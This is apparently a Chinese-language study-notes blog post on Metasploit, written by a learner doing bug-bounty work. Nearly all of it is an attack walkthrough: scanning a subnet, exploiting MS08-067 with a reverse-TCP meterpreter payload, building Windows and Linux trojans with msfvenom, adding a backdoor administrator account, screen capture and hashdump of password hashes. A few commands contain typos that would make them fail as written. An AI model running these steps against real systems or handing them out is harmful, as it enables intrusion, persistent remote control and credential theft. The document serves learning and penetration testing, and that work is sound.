題記
Cracer的教學視頻快看完了,對於基礎的學習還是十分有幫助的,還是要多看看大佬們寫的騷姿勢文章。最近補天申請了個團隊,原來人家是別的平台轉過來的,太尷尬了,還要求一月10個洞,激勵一下自己吧,挖不完我就退了。哎,補天真是太嚴格了,全校師生的學號姓名專業信息泄露給算了低危,聞者傷心,見者流淚。
Msf模塊終於有了新的理解,以前只會生成個木馬和利用。學習之路還很長啊,還是系統性的學一下cs吧。Msf第一次利用需要安裝數據庫。
netstat -tnlp 查看運行的端口
掃端口模塊
1、msfconsole
2、search portscan 搜索掃描端口的模塊
3、show auxiliary 展示auxiliary下有什么模塊(有好多)
4、use auxiliary/scanner/portscan/syn 使用這個模塊
5、show options 展示需要填充的內容
6、set ports 21-25,80-90,135,139,445,1433,3306,3389設置變量
7、setg rhosts 192.168.3.0/24 設置目標
8、setg threads 50 線程調高
9、run
特定服務掃描(其他服務類似)setg全局設置
1、search smb_version
2、use auxiliary/scanner/smb/smb_version
3、show options
4、setg rhosts 192.168.3.0/24
5、setg threads 50
6、run
按照漏洞編號對端口進行攻擊
1、search ms08_067 有哪個漏洞去網上搜漏洞編號
2、use exploit/windows/smb/ms08_067_netapi
3、 set rhost目標ip
4、show target
5、set target 34
6、 set payload windows/meterpreter/reverse_tcp 利用成功后調用msf平台反彈會話
7、show options
8、setg lhost 本地ip
9、set lport 本地端口
10、exploit
漏洞利用成功會彈出meterpreter模塊
1、ps 查看正在運行的進程
2、migrate 1404 遷移進程,最好找個具有系統權限的進程
3、run vnc 可以監控屏幕
4、screenshot 截屏
5、shell 操作對方cmd
制作木馬上傳並運行反彈shell
1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.118 lport=1311 -f exe > /root/x.exe 生成windows木馬
Msfvenom -p linux/merterpreter/reverse_tcp lhost=192.168.3.118 lport=1312 -f elf < /root/linux 生成linux木馬
2、use exploit/multi/handler 開啟監聽
3、set payload windows/meterpreter/reverse_tcp
4、set lhost 192.168.3.118
5、set lport 1311
6、show options
7、exploit
8、監聽開啟后,讓木馬在目標上運行,獲得控制權限。
獲得權限后
1、ps
2、shell 調出cmd創建用戶
3、net user cc 123.com /add
4、net localgroup adminstrators cc /add
5、migrate 1388
6、hashdump
如果獲得多個計算機的權限可以
1、background 把當前權限放到后台
2、sessions -l 查看有幾個權限
3、session -i 1 切換權限